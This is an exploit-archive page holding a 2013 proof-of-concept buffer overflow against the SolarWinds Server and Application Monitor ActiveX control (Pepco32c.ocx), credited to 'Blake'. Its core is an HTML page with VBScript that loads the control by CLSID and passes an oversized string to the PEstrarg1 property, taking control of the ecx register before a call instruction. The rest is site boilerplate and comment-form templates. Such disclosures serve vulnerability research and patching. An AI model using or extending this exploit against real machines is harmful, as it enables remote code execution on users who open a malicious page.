SolarWinds Server and Application Monitor ActiveX Buffer Overflow

2013.09.23

Credit: Blake

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

<html>
<!--
SolarWinds Server and Application Monitor ActiveX (Pepco32c) Buffer Overflow
Vendor: SolarWinds
Version: 6.0
Tested on: Windows 2003 SP2 / IE
Download: http://www.solarwinds.com/downloads/
Author: Blake
CLSID: 8AE9F829-D587-42BB-B5C1-09EE8D9547FA
Path: C:\Program Files\Common Files\SolarWinds\Pepco32c.ocx
Member Name: PEstrarg1
Progid: PEPCO32CLib.Pepco
Safe for Scripting: False
Safe for Initialization: False
Kill Bit: False
-->
<object classid='clsid:8AE9F829-D587-42BB-B5C1-09EE8D9547FA' id='target' ></object>
<script language='vbscript'>
' 132 bytes in we control ecx before the call ecx instruction
buffer = String(132, "A")
ecx = String(4, "B")
junk = String(3086, "C")
arg1 = buffer + ecx + junk
target.PEstrarg1 = arg1
</script>

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

SolarWinds Server and Application Monitor ActiveX Buffer Overflow

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.